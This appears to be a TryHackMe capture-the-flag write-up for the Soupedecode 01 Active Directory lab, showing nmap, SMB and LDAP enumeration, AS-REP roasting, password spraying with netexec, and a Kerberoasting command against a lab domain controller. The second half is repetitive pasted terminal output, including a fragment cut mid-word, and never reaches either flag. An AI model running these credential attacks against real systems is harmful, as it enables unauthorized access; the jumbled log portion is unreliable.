Challenges: Soupedecode 01 (TryHackMe)
Jebitok18 min read
Table of contents
- Soupedecode 01
- β Key Services Identified
- π Domain Details from LDAP
- π― Next Steps β What You Can Do
- π 1. SMB Enumeration (smbclient, enum4linux, smbmap)
- π 2. Kerberos Pre-auth / AS-REP Roasting Check
- π 3. LDAP Enumeration (if anonymous bind allowed)
- π₯οΈ 4. WinRM (5985)
- π§ 5. DNS Zone Transfer (unlikely, but worth a shot)
- π Recommended First Actions
- β SMB Shares Available
- Answer the questions below
The Soupedecode 01 challenge provides a realistic Windows Active Directory penetration testing scenario where enumeration, persistence, and exploitation all come into play. Players are dropped into an enterprise-like environment with a Domain Controller exposed to common services such as Kerberos, LDAP, SMB, and WinRM. Through systematic reconnaissance, enumeration of shares and users, and the abuse of weak credentials, attackers progress from low-level access to domain compromise. This lab emphasizes the importance of enumeration, password policy weaknesses, and lateral movement techniques like Pass-the-Hash.
Soupedecode 01
Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.
Note: Please allow 4 minutes for the VM to properly boot up.
nmap -p- -sV IP_Address
Starting Nmap 7.80 ( <https://nmap.org> ) at 2025-08-07 11:20 BST
Nmap scan report for ip-10-10-96-128.eu-west-1.compute.internal (10.10.96.128)
Host is up (0.00036s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-07 10:22:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49718/tcp open msrpc Microsoft Windows RPC
49792/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port53-TCP:V=7.80%I=7%D=8/7%Time=68947E7D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\\0\\x1e\\0\\x06\\x81\\x04\\0\\x01\\0\\0\\0\\0\\0\\0\\x07version\\x
SF:04bind\\0\\0\\x10\\0\\x03");
MAC Address: 02:C3:66:4F:8F:DF (Unknown)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 254.56 seconds
root@ip-10-10-240-20:~#
You're looking at a Windows Active Directory environment based on your Nmap scan.
Hereβs a breakdown of what youβve got, and how you can proceed with enumeration or exploitation:
β Key Services Identified
| Port | Service | Description |
| 88 | Kerberos | AD authentication |
| 135, 139, 445 | RPC, NetBIOS, SMB | File sharing & remote procedure calls |
| 389, 636 | LDAP, LDAPS | User and directory info |
| 3268, 3269 | Global Catalog LDAP | Often used in domain enumeration |
| 5985 | WinRM (HTTP) | Remote PowerShell (if creds are available) |
| 3389 | RDP | Remote Desktop (GUI access) |
| 53 | DNS | Likely hosting internal DNS for the AD domain |
| 593, 49664+, 49792 | RPC high ports | Common in domain controllers |
| 9389 | Active Directory Web Services | Used by PowerShell Remoting/WinRM/ADWeb |
π Domain Details from LDAP
From ports 389/3268:
Domain:
SOUPEDECODE.LOCAL0.β This looks possibly malformed, maybe a typo or obfuscation.Host/Hostname:
DC01
π― Next Steps β What You Can Do
Depending on what you're allowed or trying to test, here are common enumeration paths:
π 1. SMB Enumeration (smbclient, enum4linux, smbmap)
bash
CopyEdit
smbclient -L //10.10.96.128/ -N
enum4linux -a 10.10.96.128
smbmap -H 10.10.96.128
Look for:
Guest access
Readable shares (e.g.
NETLOGON,SYSVOL)Users/groups enumeration
π 2. Kerberos Pre-auth / AS-REP Roasting Check
If usernames are discovered (via LDAP or SMB), check for Kerberos pre-auth disabled:
bash
CopyEdit
GetNPUsers.py -dc-ip 10.10.96.128 SOUPEDECODE.LOCAL/ -no-pass -usersfile users.txt
This helps find AS-REP roastable accounts β offline hash cracking.
π 3. LDAP Enumeration (if anonymous bind allowed)
bash
CopyEdit
ldapsearch -x -H ldap://10.10.96.128 -s base
Or using tools like ldapdomaindump, windapsearch, BloodHound (via SharpHound):
bash
CopyEdit
python3 ldapdomaindump.py 10.10.96.128
π₯οΈ 4. WinRM (5985)
If you obtain valid credentials, test WinRM:
bash
CopyEdit
evil-winrm -i 10.10.96.128 -u <user> -p <pass>
π§ 5. DNS Zone Transfer (unlikely, but worth a shot)
bash
CopyEdit
dig axfr @10.10.96.128 soupedecode.local
π Recommended First Actions
Start with SMB and LDAP to extract usernames:
bash
CopyEdit
# SMB enum
enum4linux -a 10.10.96.128
# Try guest access
smbclient //10.10.96.128/IPC$ -N
Once you get a few usernames β try Kerberos or brute-force login against WinRM, SMB, or LDAP.
smbclient -L //10.10.96.128/ -N
β SMB Shares Available
From your smbclient output:
| Share | Access Type | Notes |
ADMIN$ | Admin Only | Default remote admin share |
C$ | Admin Only | Default share of C:\ drive |
IPC$ | Named pipes | Use this to query further |
NETLOGON | Readable! β | Often readable by all users |
SYSVOL | Readable! β | Contains GPOs, login scripts |
Users | May contain user folders | |
backup | Custom! β | May contain sensitive files |
π’ Focus: NETLOGON, SYSVOL, and backup β especially backup, which may contain plaintext creds, scripts, or sensitive files.
Answer the questions below
What is the user flag?
enum4linux -a 10.10.96.128
netexec smb 10.10.63.125 --users SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
echo -e "administrator\nkrbtgt\nsvc_backup\njohn\nalice" > users.txt
netexec smb 10.10.63.125 -u 'Guest' -p '' --shares
netexec smb 10.10.63.125 -u 'Guest' -p '' --shares
SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\\Guest:
SMB 10.10.63.125 445 DC01 [*] Enumerated shares
SMB 10.10.63.125 445 DC01 Share Permissions Remark
SMB 10.10.63.125 445 DC01 ----- ----------- ------
SMB 10.10.63.125 445 DC01 ADMIN$ Remote Admin
SMB 10.10.63.125 445 DC01 backup
SMB 10.10.63.125 445 DC01 C$ Default share
SMB 10.10.63.125 445 DC01 IPC$ READ Remote IPC
SMB 10.10.63.125 445 DC01 NETLOGON Logon server share
SMB 10.10.63.125 445 DC01 SYSVOL Logon server share
SMB 10.10.63.125 445 DC01 Users
netexec smb 10.10.63.125 -u users.txt -p users.txt --no-bruteforce | grep -v FAILURE
netexec smb 10.10.63.125 -u users.txt -p users.txt --no-bruteforce | grep -v FAILURE SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\svc_backup:svc_backup (Guest)
smbclient //10.10.63.125/Users -U 'soupedecode.local\\ybob317'
smbclient //10.10.63.125/Users -U 'soupedecode.local\\ybob317'
Password for [SOUPEDECODE.LOCAL\\ybob317]:
Try "help" to get a list of possible commands.
smb: \\> ls
. DR 0 Thu Jul 4 23:48:22 2024
.. DHS 0 Wed Jun 18 23:14:47 2025
admin D 0 Thu Jul 4 23:49:01 2024
Administrator D 0 Thu Aug 7 13:52:45 2025
All Users DHSrn 0 Sat May 8 09:26:16 2021
Default DHR 0 Sun Jun 16 03:51:08 2024
Default User DHSrn 0 Sat May 8 09:26:16 2021
desktop.ini AHS 174 Sat May 8 09:14:03 2021
Public DR 0 Sat Jun 15 18:54:32 2024
ybob317 D 0 Mon Jun 17 18:24:32 2024
12942591 blocks of size 4096. 10602947 blocks available
smb: \\>
445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p 'Password123!' SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\users.txt:Password123! (Guest) root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p 'Password123!' SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\users.txt:Password123! (Guest) root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p passwords.txt SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\users.txt:passwords.txt (Guest) root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u administrator -p 'admin' SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [-] SOUPEDECODE.LOCAL\administrator:admin STATUS_LOGON_FAILURE root@ip-10-10-171-65:~# smbclient //10.10.63.125/SYSVOL -U 'DOMAIN\user' Password for [user]: Try "help" to get a list of possible commands. smb: \> ls NT_STATUS_ACCESS_DENIED listing \* smb: \> quit root@ip-10-10-171-65:~# GetNPUsers.py SOUPEDECODE.LOCAL/ -usersfile users.txt -no-pass Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] [Errno 2] No such file or directory: 'users.txt' root@ip-10-10-171-65:~# GetNPUsers.py SOUPEDECODE.LOCAL/ -usersfile user.txt -no-pass Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] [Errno 2] No such file or directory: 'user.txt' root@ip-10-10-171-65:~# echo -e "administrator\nkrbtgt\nsvc_backup\njohn\nalice" > users.txt root@ip-10-10-171-65:~# echo -e "Password123!\nWelcome1\nSummer2024\nadmin\nS0up3Decode!" > passwords.txt bash: !\nWelcome1\nSummer2024\nadmin\nS0up3Decode!: event not found root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p passwords.txt
SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [-] SOUPEDECODE.LOCAL\administrator:passwords.txt STATUS_LOGON_FAILURE SMB 10.10.63.125 445 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:passwords.txt STATUS_LOGON_FAILURE SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\svc_backup:passwords.txt (Guest) root@ip-10-10-171-65:~# root@ip-10-10-171-65:~# netexec smb $(IP) -u 'Guest' -p '' --shares IP: command not found usage: netexec smb [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] [-u USERNAME [USERNAME ...]] [-p PASSWORD [PASSWORD ...]] [-id CRED_ID [CRED_ID ...]] [--ignore-pw-decoding] [--no-bruteforce] [--continue-on-success] [--gfail-limit LIMIT] [--ufail-limit LIMIT] [--fail-limit LIMIT] [-k] [--use-kcache] [--aesKey AESKEY [AESKEY ...]] [--kdcHost KDCHOST] [--pfx-cert PFXCERT] [--pfx-base64 PFXB64] [--pfx-pass PFXPASS] [--pem-cert PEMCERT] [--pem-key PEMKEY] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--options] [-H HASH [HASH ...]] [--delegate DELEGATE] [--self] [-d DOMAIN | --local-auth] [--port PORT] [--share SHARE] [--smb-server-port SMB_SERVER_PORT] [--no-smbv1] [--gen-relay-list OUTPUT_FILE] [--smb-timeout SMB_TIMEOUT] [--laps [LAPS]] [--generate-hosts-file GENERATE_HOSTS_FILE] [--generate-krb5-file GENERATE_KRB5_FILE] [--generate-tgt GENERATE_TGT] [--sam [{secdump,regdump}]] [--lsa [{secdump,regdump}]] [--ntds [{vss,drsuapi}]] [--dpapi [{cookies,nosystem} ...]] [--sccm [{disk,wmi}]] [--mkfile MKFILE] [--pvk PVK] [--enabled] [--user USERNTDS] [--shares] [--dir [DIR]] [--interfaces] [--no-write-check] [--filter-shares FILTER_SHARES [FILTER_SHARES ...]] [--smb-sessions] [--disks] [--loggedon-users-filter LOGGEDON_USERS_FILTER] [--loggedon-users [LOGGEDON_USERS]] [--users [USER ...]] [--users-export USERS_EXPORT] [--groups [GROUP]] [--computers [COMPUTER]] [--local-groups [GROUP]] [--pass-pol] [--rid-brute [MAX_RID]] [--qwinsta] [--tasklist] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider SHARE] [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST] [--depth DEPTH] [--only-files] [--silent] [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--put-file FILE FILE] [--get-file FILE FILE] [--append-host] [--exec-method {wmiexec,smbexec,mmcexec,atexec}] [--dcom-timeout DCOM_TIMEOUT] [--get-output-tries GET_OUTPUT_TRIES] [--codec CODEC] [--no-output] [-x COMMAND | -X PS_COMMAND] [--obfs] [--amsi-bypass FILE] [--clear-obfscripts] [--force-ps32] [--no-encode] target [target ...] netexec smb: error: the following arguments are required: target root@ip-10-10-171-65:~# root@ip-10-10-171-65:~# netexec smb $(IP) -u 'Guest' -p '' --shares IP: command not found usage: netexec smb [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] [-u USERNAME [USERNAME ...]] [-p PASSWORD [PASSWORD ...]] [-id CRED_ID [CRED_ID ...]] [--ignore-pw-decoding] [--no-bruteforce] [--continue-on-success] [--gfail-limit LIMIT] [--ufail-limit LIMIT] [--fail-limit LIMIT] [-k] [--use-kcache] [--aesKey AESKEY [AESKEY ...]] [--kdcHost KDCHOST] [--pfx-cert PFXCERT] [--pfx-base64 PFXB64] [--pfx-pass PFXPASS] [--pem-cert PEMCERT] [--pem-key PEMKEY] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--options] [-H HASH [HASH ...]] [--delegate DELEGATE] [--self] [-d DOMAIN | --local-auth] [--port PORT] [--share SHARE] [--smb-server-port SMB_SERVER_PORT] [--no-smbv1] [--gen-relay-list OUTPUT_FILE] [--smb-timeout SMB_TIMEOUT] [--laps [LAPS]] [--generate-hosts-file GENERATE_HOSTS_FILE] [--generate-krb5-file GENERATE_KRB5_FILE] [--generate-tgt GENERATE_TGT] [--sam [{secdump,regdump}]] [--lsa [{secdump,regdump}]] [--ntds [{vss,drsuapi}]] [--dpapi [{cookies,nosystem} ...]] [--sccm [{wmi,disk}]] [--mkfile MKFILE] [--pvk PVK] [--enabled] [--user USERNTDS] [--shares] [--dir [DIR]] [--interfaces] [--no-write-check] [--filter-shares FILTER_SHARES [FILTER_SHARES ...]] [--smb-sessions] [--disks] [--loggedon-users-filter LOGGEDON_USERS_FILTER] [--loggedon-users [LOGGEDON_USERS]] [--users [USER ...]] [--users-export USERS_EXPORT] [--groups [GROUP]] [--computers [COMPUTER]] [--local-groups [GROUP]] [--pass-pol] [--rid-brute [MAX_RID]] [--qwinsta] [--tasklist] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider SHARE] [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST] [--depth DEPTH] [--only-files] [--silent] [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--put-file FILE FILE] [--get-file FILE FILE] [--append-host] [--exec-method {wmiexec,atexec,mmcexec,smbexec}] [--dcom-timeout DCOM_TIMEOUT] [--get-output-tries GET_OUTPUT_TRIES] [--codec CODEC] [--no-output] [-x COMMAND | -X PS_COMMAND] [--obfs] [--amsi-bypass FILE] [--clear-obfscripts] [--force-ps32] [--no-encode] target [target ...] netexec smb: error: the following arguments are required: target root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --shares SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\Guest: SMB 10.10.63.125 445 DC01 [] Enumerated shares SMB 10.10.63.125 445 DC01 Share Permissions Remark SMB 10.10.63.125 445 DC01 ----- ----------- ------ SMB 10.10.63.125 445 DC01 ADMIN$ Remote Admin SMB 10.10.63.125 445 DC01 backup SMB 10.10.63.125 445 DC01 C$ Default share SMB 10.10.63.125 445 DC01 IPC$ READ Remote IPC SMB 10.10.63.125 445 DC01 NETLOGON Logon server share SMB 10.10.63.125 445 DC01 SYSVOL Logon server share SMB 10.10.63.125 445 DC01 Users root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --list backup usage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] {rdp,ssh,ldap,winrm,wmi,smb,mssql,ftp,nfs,vnc} ... netexec: error: unrecognized arguments: backup root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --list backup usage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] {rdp,ssh,ldap,winrm,wmi,smb,mssql,ftp,nfs,vnc} ... netexec: error: unrecognized arguments: backup root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p users.txt --no-bruteforce | grep -v FAILURE SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\svc_backup:svc_backup (Guest) root@ip-10-10-171-65:~# smbclient //10.10.63.125/Users -U 'soupedecode.local\ybob317' Password for [SOUPEDECODE.LOCAL\ybob317]: Try "help" to get a list of possible commands. smb: \> ls . DR 0 Thu Jul 4 23:48:22 2024 .. DHS 0 Wed Jun 18 23:14:47 2025 admin D 0 Thu Jul 4 23:49:01 2024 Administrator D 0 Thu Aug 7 13:52:45 2025 All Users DHSrn 0 Sat May 8 09:26:16 2021 Default DHR 0 Sun Jun 16 03:51:08 2024 Default User DHSrn 0 Sat May 8 09:26:16 2021 desktop.ini AHS 174 Sat May 8 09:14:03 2021 Public DR 0 Sat Jun 15 18:54:32 2024 ybob317 D 0 Mon Jun 17 18:24:32 2024
smb: \> cd ybob317 smb: \ybob317\> ls . D 0 Mon Jun 17 18:24:32 2024 .. DR 0 Thu Jul 4 23:48:22 2024 3D Objects DR 0 Mon Jun 17 18:24:32 2024 AppData DH 0 Mon Jun 17 18:24:30 2024 Application Data DHSrn 0 Mon Jun 17 18:24:30 2024 Contacts DR 0 Mon Jun 17 18:24:32 2024 Cookies DHSrn 0 Mon Jun 17 18:24:30 2024 Desktop DR 0 Fri Jul 25 18:51:44 2025 Documents DR 0 Mon Jun 17 18:24:32 2024 Downloads DR 0 Mon Jun 17 18:24:32 2024 Favorites DR 0 Mon Jun 17 18:24:32 2024 Links DR 0 Mon Jun 17 18:24:32 2024 Local Settings DHSrn 0 Mon Jun 17 18:24:30 2024 Music DR 0 Mon Jun 17 18:24:32 2024 My Documents DHSrn 0 Mon Jun 17 18:24:30 2024 NetHood DHSrn 0 Mon Jun 17 18:24:30 2024 NTUSER.DAT AHn 262144 Thu Aug 7 14:13:12 2025 ntuser.dat.LOG1 AHS 81920 Mon Jun 17 18:24:29 2024 ntuser.dat.LOG2 AHS 0 Mon Jun 17 18:24:29 2024 NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TM.blf AHS 65536 Mon Jun 17 18:24:54 2024 NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jun 17 18:24:29 2024 NTUSER.DAT{3e6aec0f-2b8b-11ef-bb89-080027df5733}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jun 17 18:24:29 2024 ntuser.ini AHS 20 Mon Jun 17 18:24:30 2024 Pictures DR 0 Mon Jun 17 18:24:32 2024 Recent DHSrn 0 Mon Jun 17 18:24:30 2024 Saved Games DR 0 Mon Jun 17 18:24:32 2024 Searches DR 0 Mon Jun 17 18:24:32 2024 SendTo DHSrn 0 Mon Jun 17 18:24:30 2024 Start Menu DHSrn 0 Mon Jun 17 18:24:30 2024 Templates DHSrn 0 Mon Jun 17 18:24:30 2024 Videos DR 0 Mon Jun 17 18:24:32 2024
smb: \ybob317\>
What is the root flag?
impacket-GetUserSPNs soupedecode.local/ybob317:ybob317 -dc-ip *10.10.63.125* -request
ackup:passwords.txt (Guest) root@ip-10-10-171-65:~# root@ip-10-10-171-65:~# netexec smb $(IP) -u 'Guest' -p '' --shares IP: command not found usage: netexec smb [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] [-u USERNAME [USERNAME ...]] [-p PASSWORD [PASSWORD ...]] [-id CRED_ID [CRED_ID ...]] [--ignore-pw-decoding] [--no-bruteforce] [--continue-on-success] [--gfail-limit LIMIT] [--ufail-limit LIMIT] [--fail-limit LIMIT] [-k] [--use-kcache] [--aesKey AESKEY [AESKEY ...]] [--kdcHost KDCHOST] [--pfx-cert PFXCERT] [--pfx-base64 PFXB64] [--pfx-pass PFXPASS] [--pem-cert PEMCERT] [--pem-key PEMKEY] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--options] [-H HASH [HASH ...]] [--delegate DELEGATE] [--self] [-d DOMAIN | --local-auth] [--port PORT] [--share SHARE] [--smb-server-port SMB_SERVER_PORT] [--no-smbv1] [--gen-relay-list OUTPUT_FILE] [--smb-timeout SMB_TIMEOUT] [--laps [LAPS]] [--generate-hosts-file GENERATE_HOSTS_FILE] [--generate-krb5-file GENERATE_KRB5_FILE] [--generate-tgt GENERATE_TGT] [--sam [{secdump,regdump}]] [--lsa [{secdump,regdump}]] [--ntds [{vss,drsuapi}]] [--dpapi [{cookies,nosystem} ...]] [--sccm [{disk,wmi}]] [--mkfile MKFILE] [--pvk PVK] [--enabled] [--user USERNTDS] [--shares] [--dir [DIR]] [--interfaces] [--no-write-check] [--filter-shares FILTER_SHARES [FILTER_SHARES ...]] [--smb-sessions] [--disks] [--loggedon-users-filter LOGGEDON_USERS_FILTER] [--loggedon-users [LOGGEDON_USERS]] [--users [USER ...]] [--users-export USERS_EXPORT] [--groups [GROUP]] [--computers [COMPUTER]] [--local-groups [GROUP]] [--pass-pol] [--rid-brute [MAX_RID]] [--qwinsta] [--tasklist] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider SHARE] [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST] [--depth DEPTH] [--only-files] [--silent] [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--put-file FILE FILE] [--get-file FILE FILE] [--append-host] [--exec-method {wmiexec,smbexec,mmcexec,atexec}] [--dcom-timeout DCOM_TIMEOUT] [--get-output-tries GET_OUTPUT_TRIES] [--codec CODEC] [--no-output] [-x COMMAND | -X PS_COMMAND] [--obfs] [--amsi-bypass FILE] [--clear-obfscripts] [--force-ps32] [--no-encode] target [target ...] netexec smb: error: the following arguments are required: target root@ip-10-10-171-65:~# root@ip-10-10-171-65:~# netexec smb $(IP) -u 'Guest' -p '' --shares IP: command not found usage: netexec smb [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] [-u USERNAME [USERNAME ...]] [-p PASSWORD [PASSWORD ...]] [-id CRED_ID [CRED_ID ...]] [--ignore-pw-decoding] [--no-bruteforce] [--continue-on-success] [--gfail-limit LIMIT] [--ufail-limit LIMIT] [--fail-limit LIMIT] [-k] [--use-kcache] [--aesKey AESKEY [AESKEY ...]] [--kdcHost KDCHOST] [--pfx-cert PFXCERT] [--pfx-base64 PFXB64] [--pfx-pass PFXPASS] [--pem-cert PEMCERT] [--pem-key PEMKEY] [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L] [--options] [-H HASH [HASH ...]] [--delegate DELEGATE] [--self] [-d DOMAIN | --local-auth] [--port PORT] [--share SHARE] [--smb-server-port SMB_SERVER_PORT] [--no-smbv1] [--gen-relay-list OUTPUT_FILE] [--smb-timeout SMB_TIMEOUT] [--laps [LAPS]] [--generate-hosts-file GENERATE_HOSTS_FILE] [--generate-krb5-file GENERATE_KRB5_FILE] [--generate-tgt GENERATE_TGT] [--sam [{secdump,regdump}]] [--lsa [{secdump,regdump}]] [--ntds [{vss,drsuapi}]] [--dpapi [{cookies,nosystem} ...]] [--sccm [{wmi,disk}]] [--mkfile MKFILE] [--pvk PVK] [--enabled] [--user USERNTDS] [--shares] [--dir [DIR]] [--interfaces] [--no-write-check] [--filter-shares FILTER_SHARES [FILTER_SHARES ...]] [--smb-sessions] [--disks] [--loggedon-users-filter LOGGEDON_USERS_FILTER] [--loggedon-users [LOGGEDON_USERS]] [--users [USER ...]] [--users-export USERS_EXPORT] [--groups [GROUP]] [--computers [COMPUTER]] [--local-groups [GROUP]] [--pass-pol] [--rid-brute [MAX_RID]] [--qwinsta] [--tasklist] [--wmi QUERY] [--wmi-namespace NAMESPACE] [--spider SHARE] [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST] [--depth DEPTH] [--only-files] [--silent] [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]] [--put-file FILE FILE] [--get-file FILE FILE] [--append-host] [--exec-method {wmiexec,atexec,mmcexec,smbexec}] [--dcom-timeout DCOM_TIMEOUT] [--get-output-tries GET_OUTPUT_TRIES] [--codec CODEC] [--no-output] [-x COMMAND | -X PS_COMMAND] [--obfs] [--amsi-bypass FILE] [--clear-obfscripts] [--force-ps32] [--no-encode] target [target ...] netexec smb: error: the following arguments are required: target root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --shares SMB 10.10.63.125 445 DC01 [] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 445 DC01 [+] SOUPEDECODE.LOCAL\Guest: SMB 10.10.63.125 445 DC01 [] Enumerated shares SMB 10.10.63.125 445 DC01 Share Permissions Remark SMB 10.10.63.125 445 DC01 ----- ----------- ------ SMB 10.10.63.125 445 DC01 ADMIN$ Remote Admin SMB 10.10.63.125 445 DC01 backup
SMB 10.10.63.125 445 DC01 C$ Default share SMB 10.10.63.125 445 DC01 IPC$ READ Remote IPC SMB 10.10.63.125 445 DC01 NETLOGON Logon server share SMB 10.10.63.125 445 DC01 SYSVOL Logon server share SMB 10.10.63.125 445 DC01 Users
root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --list backup usage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] {rdp,ssh,ldap,winrm,wmi,smb,mssql,ftp,nfs,vnc} ... netexec: error: unrecognized arguments: backup root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u 'Guest' -p '' --list backup usage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6] [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] {rdp,ssh,ldap,winrm,wmi,smb,mssql,ftp,nfs,vnc} ... netexec: error: unrecognized arguments: backup root@ip-10-10-171-65:~# netexec smb 10.10.63.125 -u users.txt -p users.txt --no-bruteforce | grep -v FAILURE SMB 10.10.63.125 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False) SMB 10.10.63.125 